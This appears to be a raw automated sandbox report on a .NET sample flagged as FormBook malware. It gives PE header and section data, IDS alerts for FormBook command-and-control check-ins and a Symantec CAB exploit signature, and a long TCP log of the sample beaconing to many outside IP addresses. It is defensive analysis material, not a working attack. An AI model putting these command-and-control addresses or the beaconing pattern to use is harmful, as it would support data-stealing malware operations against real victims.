                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xb297b0x4f.text
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xb40000x58c.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xb60000xc.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xb0a080x54.text
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x20000xb09d40xb0a00d0295f5b3fc106a466f6dc430601ccdbFalse0.9232088751769285data7.853755430579226IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rsrc0xb40000x58c0x600ee42c5c18c13dd70ddf5d737ac57c560False0.4166666666666667data4.041516124813799IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc0xb60000xc0x20072c68ec337e915da5fa16f433521afc3False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  RT_VERSION0xb40900x2fcdata0.4410994764397906
                                                                                  RT_MANIFEST0xb439c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                  DLLImport
                                                                                  mscoree.dll_CorExeMain
                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2024-11-13T15:33:26.506314+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.549727TCP
                                                                                  2024-11-13T15:34:05.939404+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.549940TCP
                                                                                  2024-11-13T15:34:06.956752+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549950185.134.245.11380TCP
                                                                                  2024-11-13T15:34:06.956752+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549950185.134.245.11380TCP
                                                                                  2024-11-13T15:34:23.994480+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549983208.115.225.22080TCP
                                                                                  2024-11-13T15:34:25.924547+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549984208.115.225.22080TCP
                                                                                  2024-11-13T15:34:28.459454+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549985208.115.225.22080TCP
                                                                                  2024-11-13T15:34:30.995967+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549986208.115.225.22080TCP
                                                                                  2024-11-13T15:34:30.995967+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549986208.115.225.22080TCP
                                                                                  2024-11-13T15:34:37.185749+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549987194.58.112.17480TCP
                                                                                  2024-11-13T15:34:39.695401+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549988194.58.112.17480TCP
                                                                                  2024-11-13T15:34:42.646152+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549989194.58.112.17480TCP
                                                                                  2024-11-13T15:34:45.236728+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549990194.58.112.17480TCP
                                                                                  2024-11-13T15:34:45.236728+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549990194.58.112.17480TCP
                                                                                  2024-11-13T15:34:52.388822+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54999120.2.36.11280TCP
                                                                                  2024-11-13T15:34:54.935711+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54999220.2.36.11280TCP
                                                                                  2024-11-13T15:34:57.545146+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54999320.2.36.11280TCP
                                                                                  2024-11-13T15:35:00.107606+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54999420.2.36.11280TCP
                                                                                  2024-11-13T15:35:00.107606+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54999420.2.36.11280TCP
                                                                                  2024-11-13T15:35:05.997934+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549995203.161.46.20580TCP
                                                                                  2024-11-13T15:35:08.532649+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549996203.161.46.20580TCP
                                                                                  2024-11-13T15:35:11.091578+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549997203.161.46.20580TCP
                                                                                  2024-11-13T15:35:14.617206+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549998203.161.46.20580TCP
                                                                                  2024-11-13T15:35:14.617206+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549998203.161.46.20580TCP
                                                                                  2024-11-13T15:35:20.895373+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54999968.66.226.9280TCP
                                                                                  2024-11-13T15:35:23.479307+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55000068.66.226.9280TCP
                                                                                  2024-11-13T15:35:26.001141+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55000168.66.226.9280TCP
                                                                                  2024-11-13T15:35:28.543456+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.55000268.66.226.9280TCP
                                                                                  2024-11-13T15:35:28.543456+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55000268.66.226.9280TCP
                                                                                  2024-11-13T15:35:34.686169+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550003109.70.26.3780TCP
                                                                                  2024-11-13T15:35:37.795182+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550004109.70.26.3780TCP
                                                                                  2024-11-13T15:35:39.748234+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550005109.70.26.3780TCP
                                                                                  2024-11-13T15:35:42.341995+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550006109.70.26.3780TCP
                                                                                  2024-11-13T15:35:42.341995+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550006109.70.26.3780TCP
                                                                                  2024-11-13T15:35:51.201369+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55000720.2.249.780TCP
                                                                                  2024-11-13T15:35:53.763868+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55000820.2.249.780TCP
                                                                                  2024-11-13T15:35:56.310755+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55000920.2.249.780TCP
                                                                                  2024-11-13T15:35:58.921418+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.55001020.2.249.780TCP
                                                                                  2024-11-13T15:35:58.921418+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55001020.2.249.780TCP
                                                                                  2024-11-13T15:36:05.114998+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550011172.67.197.5780TCP
                                                                                  2024-11-13T15:36:07.717686+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550012172.67.197.5780TCP
                                                                                  2024-11-13T15:36:10.182261+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550013172.67.197.5780TCP
                                                                                  2024-11-13T15:36:12.733186+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550014172.67.197.5780TCP
                                                                                  2024-11-13T15:36:12.733186+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550014172.67.197.5780TCP
                                                                                  2024-11-13T15:36:18.896260+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55001550.18.131.22080TCP
                                                                                  2024-11-13T15:36:21.198476+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55001650.18.131.22080TCP
                                                                                  2024-11-13T15:36:23.779119+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55001750.18.131.22080TCP
                                                                                  2024-11-13T15:36:26.700645+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.55001850.18.131.22080TCP
                                                                                  2024-11-13T15:36:26.700645+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55001850.18.131.22080TCP
                                                                                  2024-11-13T15:36:40.910512+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550019103.224.182.24280TCP
                                                                                  2024-11-13T15:36:43.419423+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550020103.224.182.24280TCP
                                                                                  2024-11-13T15:36:46.827586+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550021103.224.182.24280TCP
                                                                                  2024-11-13T15:36:49.331594+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550022103.224.182.24280TCP
                                                                                  2024-11-13T15:36:49.331594+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550022103.224.182.24280TCP
                                                                                  2024-11-13T15:36:55.120070+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55002376.223.74.7480TCP
                                                                                  2024-11-13T15:36:57.662562+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55002476.223.74.7480TCP
                                                                                  2024-11-13T15:37:00.260720+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55002576.223.74.7480TCP
                                                                                  2024-11-13T15:37:02.851534+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.55002676.223.74.7480TCP
                                                                                  2024-11-13T15:37:02.851534+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55002676.223.74.7480TCP
                                                                                  2024-11-13T15:37:09.841662+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550027163.44.185.18380TCP
                                                                                  2024-11-13T15:37:12.389384+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550028163.44.185.18380TCP
                                                                                  2024-11-13T15:37:14.922552+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550029163.44.185.18380TCP
                                                                                  2024-11-13T15:37:17.605683+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550030163.44.185.18380TCP
                                                                                  2024-11-13T15:37:17.605683+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550030163.44.185.18380TCP
                                                                                  2024-11-13T15:37:24.060641+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550031188.114.96.380TCP
                                                                                  2024-11-13T15:37:26.215611+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550032188.114.96.380TCP
                                                                                  2024-11-13T15:37:28.803116+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550033188.114.96.380TCP
                                                                                  2024-11-13T15:37:31.486188+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550034188.114.96.380TCP
                                                                                  2024-11-13T15:37:31.486188+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550034188.114.96.380TCP
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Nov 13, 2024 15:34:06.098299980 CET4995080192.168.2.5185.134.245.113
                                                                                  Nov 13, 2024 15:34:06.104475975 CET8049950185.134.245.113192.168.2.5
                                                                                  Nov 13, 2024 15:34:06.104583979 CET4995080192.168.2.5185.134.245.113
                                                                                  Nov 13, 2024 15:34:06.118314981 CET4995080192.168.2.5185.134.245.113
                                                                                  Nov 13, 2024 15:34:06.123399019 CET8049950185.134.245.113192.168.2.5
                                                                                  Nov 13, 2024 15:34:06.956535101 CET8049950185.134.245.113192.168.2.5
                                                                                  Nov 13, 2024 15:34:06.956558943 CET8049950185.134.245.113192.168.2.5
                                                                                  Nov 13, 2024 15:34:06.956571102 CET8049950185.134.245.113192.168.2.5
                                                                                  Nov 13, 2024 15:34:06.956752062 CET4995080192.168.2.5185.134.245.113
                                                                                  Nov 13, 2024 15:34:06.956865072 CET8049950185.134.245.113192.168.2.5
                                                                                  Nov 13, 2024 15:34:06.956877947 CET8049950185.134.245.113192.168.2.5
                                                                                  Nov 13, 2024 15:34:06.956888914 CET8049950185.134.245.113192.168.2.5
                                                                                  Nov 13, 2024 15:34:06.956926107 CET4995080192.168.2.5185.134.245.113
                                                                                  Nov 13, 2024 15:34:06.956969976 CET4995080192.168.2.5185.134.245.113
                                                                                  Nov 13, 2024 15:34:07.090255022 CET8049950185.134.245.113192.168.2.5
                                                                                  Nov 13, 2024 15:34:07.090471983 CET4995080192.168.2.5185.134.245.113
                                                                                  Nov 13, 2024 15:34:07.091593981 CET4995080192.168.2.5185.134.245.113
                                                                                  Nov 13, 2024 15:34:07.096868038 CET8049950185.134.245.113192.168.2.5
                                                                                  Nov 13, 2024 15:34:22.651362896 CET4998380192.168.2.5208.115.225.220
                                                                                  Nov 13, 2024 15:34:22.656351089 CET8049983208.115.225.220192.168.2.5
                                                                                  Nov 13, 2024 15:34:22.656429052 CET4998380192.168.2.5208.115.225.220
                                                                                  Nov 13, 2024 15:34:22.670736074 CET4998380192.168.2.5208.115.225.220
                                                                                  Nov 13, 2024 15:34:22.675640106 CET8049983208.115.225.220192.168.2.5
                                                                                  Nov 13, 2024 15:34:23.994396925 CET8049983208.115.225.220192.168.2.5
                                                                                  Nov 13, 2024 15:34:23.994422913 CET8049983208.115.225.220192.168.2.5
                                                                                  Nov 13, 2024 15:34:23.994481087 CET8049983208.115.225.220192.168.2.5
                                                                                  Nov 13, 2024 15:34:23.994479895 CET4998380192.168.2.5208.115.225.220
                                                                                  Nov 13, 2024 15:34:23.994525909 CET4998380192.168.2.5208.115.225.220
                                                                                  Nov 13, 2024 15:34:23.994760036 CET8049983208.115.225.220192.168.2.5
                                                                                  Nov 13, 2024 15:34:23.994807959 CET4998380192.168.2.5208.115.225.220
                                                                                  Nov 13, 2024 15:34:23.999409914 CET8049983208.115.225.220192.168.2.5
                                                                                  Nov 13, 2024 15:34:23.999490023 CET4998380192.168.2.5208.115.225.220
                                                                                  Nov 13, 2024 15:34:24.185923100 CET4998380192.168.2.5208.115.225.220
                                                                                  Nov 13, 2024 15:34:25.204313993 CET4998480192.168.2.5208.115.225.220
                                                                                  Nov 13, 2024 15:34:25.209749937 CET8049984208.115.225.220192.168.2.5
                                                                                  Nov 13, 2024 15:34:25.209868908 CET4998480192.168.2.5208.115.225.220
                                                                                  Nov 13, 2024 15:34:25.223632097 CET4998480192.168.2.5208.115.225.220
                                                                                  Nov 13, 2024 15:34:25.228837967 CET8049984208.115.225.220192.168.2.5
                                                                                  Nov 13, 2024 15:34:25.924294949 CET8049984208.115.225.220192.168.2.5
                                                                                  Nov 13, 2024 15:34:25.924437046 CET8049984208.115.225.220192.168.2.5
                                                                                  Nov 13, 2024 15:34:25.924448013 CET8049984208.115.225.220192.168.2.5
                                                                                  Nov 13, 2024 15:34:25.924546957 CET4998480192.168.2.5208.115.225.220
                                                                                  Nov 13, 2024 15:34:26.732690096 CET4998480192.168.2.5208.115.225.220
                                                                                  Nov 13, 2024 15:34:27.751056910 CET4998580192.168.2.5208.115.225.220
                                                                                  Nov 13, 2024 15:34:27.755939960 CET8049985208.115.225.220192.168.2.5
                                                                                  Nov 13, 2024 15:34:27.756064892 CET4998580192.168.2.5208.115.225.220
                                                                                  Nov 13, 2024 15:34:27.778934002 CET4998580192.168.2.5208.115.225.220
                                                                                  Nov 13, 2024 15:34:27.784250975 CET8049985208.115.225.220192.168.2.5
                                                                                  Nov 13, 2024 15:34:27.784511089 CET8049985208.115.225.220192.168.2.5
                                                                                  Nov 13, 2024 15:34:28.432128906 CET8049985208.115.225.220192.168.2.5
                                                                                  Nov 13, 2024 15:34:28.459393024 CET8049985208.115.225.220192.168.2.5
                                                                                  Nov 13, 2024 15:34:28.459454060 CET4998580192.168.2.5208.115.225.220
                                                                                  Nov 13, 2024 15:34:29.295212984 CET4998580192.168.2.5208.115.225.220
                                                                                  Nov 13, 2024 15:34:30.314872026 CET4998680192.168.2.5208.115.225.220
                                                                                  Nov 13, 2024 15:34:30.319785118 CET8049986208.115.225.220192.168.2.5
                                                                                  Nov 13, 2024 15:34:30.319883108 CET4998680192.168.2.5208.115.225.220
                                                                                  Nov 13, 2024 15:34:30.328169107 CET4998680192.168.2.5208.115.225.220
                                                                                  Nov 13, 2024 15:34:30.333103895 CET8049986208.115.225.220192.168.2.5
                                                                                  Nov 13, 2024 15:34:30.968936920 CET8049986208.115.225.220192.168.2.5
                                                                                  Nov 13, 2024 15:34:30.995769024 CET8049986208.115.225.220192.168.2.5
                                                                                  Nov 13, 2024 15:34:30.995966911 CET4998680192.168.2.5208.115.225.220
                                                                                  Nov 13, 2024 15:34:30.997183084 CET4998680192.168.2.5208.115.225.220
                                                                                  Nov 13, 2024 15:34:31.002024889 CET8049986208.115.225.220192.168.2.5
                                                                                  Nov 13, 2024 15:34:36.258268118 CET4998780192.168.2.5194.58.112.174
                                                                                  Nov 13, 2024 15:34:36.263277054 CET8049987194.58.112.174192.168.2.5
                                                                                  Nov 13, 2024 15:34:36.263365984 CET4998780192.168.2.5194.58.112.174
                                                                                  Nov 13, 2024 15:34:36.275343895 CET4998780192.168.2.5194.58.112.174
                                                                                  Nov 13, 2024 15:34:36.280827045 CET8049987194.58.112.174192.168.2.5
                                                                                  Nov 13, 2024 15:34:37.185626030 CET8049987194.58.112.174192.168.2.5
                                                                                  Nov 13, 2024 15:34:37.185672998 CET8049987194.58.112.174192.168.2.5
                                                                                  Nov 13, 2024 15:34:37.185710907 CET8049987194.58.112.174192.168.2.5
                                                                                  Nov 13, 2024 15:34:37.185740948 CET8049987194.58.112.174192.168.2.5
                                                                                  Nov 13, 2024 15:34:37.185749054 CET4998780192.168.2.5194.58.112.174
                                                                                  Nov 13, 2024 15:34:37.185790062 CET4998780192.168.2.5194.58.112.174
                                                                                  Nov 13, 2024 15:34:37.334894896 CET8049987194.58.112.174192.168.2.5
                                                                                  Nov 13, 2024 15:34:37.334983110 CET4998780192.168.2.5194.58.112.174
                                                                                  Nov 13, 2024 15:34:37.779650927 CET4998780192.168.2.5194.58.112.174
                                                                                  Nov 13, 2024 15:34:38.797878981 CET4998880192.168.2.5194.58.112.174
                                                                                  Nov 13, 2024 15:34:38.802947044 CET8049988194.58.112.174192.168.2.5
                                                                                  Nov 13, 2024 15:34:38.803067923 CET4998880192.168.2.5194.58.112.174
                                                                                  Nov 13, 2024 15:34:38.814937115 CET4998880192.168.2.5194.58.112.174
                                                                                  Nov 13, 2024 15:34:38.820436001 CET8049988194.58.112.174192.168.2.5
                                                                                  Nov 13, 2024 15:34:39.695214987 CET8049988194.58.112.174192.168.2.5
                                                                                  Nov 13, 2024 15:34:39.695230961 CET8049988194.58.112.174192.168.2.5
                                                                                  Nov 13, 2024 15:34:39.695241928 CET8049988194.58.112.174192.168.2.5
                                                                                  Nov 13, 2024 15:34:39.695400953 CET4998880192.168.2.5194.58.112.174
                                                                                  Nov 13, 2024 15:34:39.847704887 CET8049988194.58.112.174192.168.2.5
                                                                                  Nov 13, 2024 15:34:39.847774982 CET4998880192.168.2.5194.58.112.174
                                                                                  Nov 13, 2024 15:34:40.326363087 CET4998880192.168.2.5194.58.112.174
                                                                                  Nov 13, 2024 15:34:41.344675064 CET4998980192.168.2.5194.58.112.174
                                                                                  Nov 13, 2024 15:34:41.742327929 CET8049989194.58.112.174192.168.2.5
                                                                                  Nov 13, 2024 15:34:41.742470026 CET4998980192.168.2.5194.58.112.174
                                                                                  Nov 13, 2024 15:34:41.756974936 CET4998980192.168.2.5194.58.112.174
                                                                                  Nov 13, 2024 15:34:41.761884928 CET8049989194.58.112.174192.168.2.5
                                                                                  Nov 13, 2024 15:34:41.762145042 CET8049989194.58.112.174192.168.2.5
                                                                                  Nov 13, 2024 15:34:42.646076918 CET8049989194.58.112.174192.168.2.5
                                                                                  Nov 13, 2024 15:34:42.646094084 CET8049989194.58.112.174192.168.2.5
                                                                                  Nov 13, 2024 15:34:42.646106005 CET8049989194.58.112.174192.168.2.5
                                                                                  Nov 13, 2024 15:34:42.646152020 CET4998980192.168.2.5194.58.112.174
                                                                                  Nov 13, 2024 15:34:42.701292992 CET4998980192.168.2.5194.58.112.174
                                                                                  Nov 13, 2024 15:34:42.796835899 CET8049989194.58.112.174192.168.2.5
                                                                                  Nov 13, 2024 15:34:42.796961069 CET4998980192.168.2.5194.58.112.174
                                                                                  Nov 13, 2024 15:34:43.263964891 CET4998980192.168.2.5194.58.112.174
                                                                                  Nov 13, 2024 15:34:44.288024902 CET4999080192.168.2.5194.58.112.174
                                                                                  Nov 13, 2024 15:34:44.331556082 CET8049990194.58.112.174192.168.2.5
                                                                                  Nov 13, 2024 15:34:44.331645012 CET4999080192.168.2.5194.58.112.174
                                                                                  Nov 13, 2024 15:34:44.339449883 CET4999080192.168.2.5194.58.112.174
                                                                                  Nov 13, 2024 15:34:44.345189095 CET8049990194.58.112.174192.168.2.5
                                                                                  Nov 13, 2024 15:34:45.236531019 CET8049990194.58.112.174192.168.2.5
                                                                                  Nov 13, 2024 15:34:45.236546040 CET8049990194.58.112.174192.168.2.5
                                                                                  Nov 13, 2024 15:34:45.236556053 CET8049990194.58.112.174192.168.2.5
                                                                                  Nov 13, 2024 15:34:45.236566067 CET8049990194.58.112.174192.168.2.5
                                                                                  Nov 13, 2024 15:34:45.236577034 CET8049990194.58.112.174192.168.2.5
                                                                                  Nov 13, 2024 15:34:45.236587048 CET8049990194.58.112.174192.168.2.5
                                                                                  Nov 13, 2024 15:34:45.236598015 CET8049990194.58.112.174192.168.2.5
                                                                                  Nov 13, 2024 15:34:45.236727953 CET4999080192.168.2.5194.58.112.174
                                                                                  Nov 13, 2024 15:34:45.236905098 CET4999080192.168.2.5194.58.112.174
                                                                                  Nov 13, 2024 15:34:45.238162994 CET8049990194.58.112.174192.168.2.5
                                                                                  Nov 13, 2024 15:34:45.238204002 CET4999080192.168.2.5194.58.112.174
                                                                                  Nov 13, 2024 15:34:45.385195017 CET8049990194.58.112.174192.168.2.5
                                                                                  Nov 13, 2024 15:34:45.385457039 CET4999080192.168.2.5194.58.112.174
                                                                                  Nov 13, 2024 15:34:45.414210081 CET4999080192.168.2.5194.58.112.174
                                                                                  Nov 13, 2024 15:34:45.419373989 CET8049990194.58.112.174192.168.2.5
                                                                                  Nov 13, 2024 15:34:51.363922119 CET4999180192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:34:51.370584011 CET804999120.2.36.112192.168.2.5
                                                                                  Nov 13, 2024 15:34:51.370682001 CET4999180192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:34:51.384433031 CET4999180192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:34:51.389471054 CET804999120.2.36.112192.168.2.5
                                                                                  Nov 13, 2024 15:34:52.340709925 CET804999120.2.36.112192.168.2.5
                                                                                  Nov 13, 2024 15:34:52.388822079 CET4999180192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:34:52.519910097 CET804999120.2.36.112192.168.2.5
                                                                                  Nov 13, 2024 15:34:52.520026922 CET4999180192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:34:52.889126062 CET4999180192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:34:53.907408953 CET4999280192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:34:53.912347078 CET804999220.2.36.112192.168.2.5
                                                                                  Nov 13, 2024 15:34:53.912595034 CET4999280192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:34:53.925340891 CET4999280192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:34:53.930994034 CET804999220.2.36.112192.168.2.5
                                                                                  Nov 13, 2024 15:34:54.895725012 CET804999220.2.36.112192.168.2.5
                                                                                  Nov 13, 2024 15:34:54.935710907 CET4999280192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:34:55.376669884 CET804999220.2.36.112192.168.2.5
                                                                                  Nov 13, 2024 15:34:55.376836061 CET4999280192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:34:55.378937006 CET804999220.2.36.112192.168.2.5
                                                                                  Nov 13, 2024 15:34:55.379005909 CET4999280192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:34:55.435930967 CET4999280192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:34:56.455594063 CET4999380192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:34:56.535548925 CET804999320.2.36.112192.168.2.5
                                                                                  Nov 13, 2024 15:34:56.535660028 CET4999380192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:34:56.555814028 CET4999380192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:34:56.560726881 CET804999320.2.36.112192.168.2.5
                                                                                  Nov 13, 2024 15:34:56.560975075 CET804999320.2.36.112192.168.2.5
                                                                                  Nov 13, 2024 15:34:57.504945040 CET804999320.2.36.112192.168.2.5
                                                                                  Nov 13, 2024 15:34:57.545145988 CET4999380192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:34:57.685012102 CET804999320.2.36.112192.168.2.5
                                                                                  Nov 13, 2024 15:34:57.685178041 CET4999380192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:34:58.060830116 CET4999380192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:34:59.080638885 CET4999480192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:34:59.085537910 CET804999420.2.36.112192.168.2.5
                                                                                  Nov 13, 2024 15:34:59.085647106 CET4999480192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:34:59.095902920 CET4999480192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:34:59.100929976 CET804999420.2.36.112192.168.2.5
                                                                                  Nov 13, 2024 15:35:00.061930895 CET804999420.2.36.112192.168.2.5
                                                                                  Nov 13, 2024 15:35:00.107605934 CET4999480192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:35:00.245018005 CET804999420.2.36.112192.168.2.5
                                                                                  Nov 13, 2024 15:35:00.245155096 CET4999480192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:35:00.246299028 CET4999480192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:35:00.251266003 CET804999420.2.36.112192.168.2.5
                                                                                  Nov 13, 2024 15:35:05.302783012 CET4999580192.168.2.5203.161.46.205
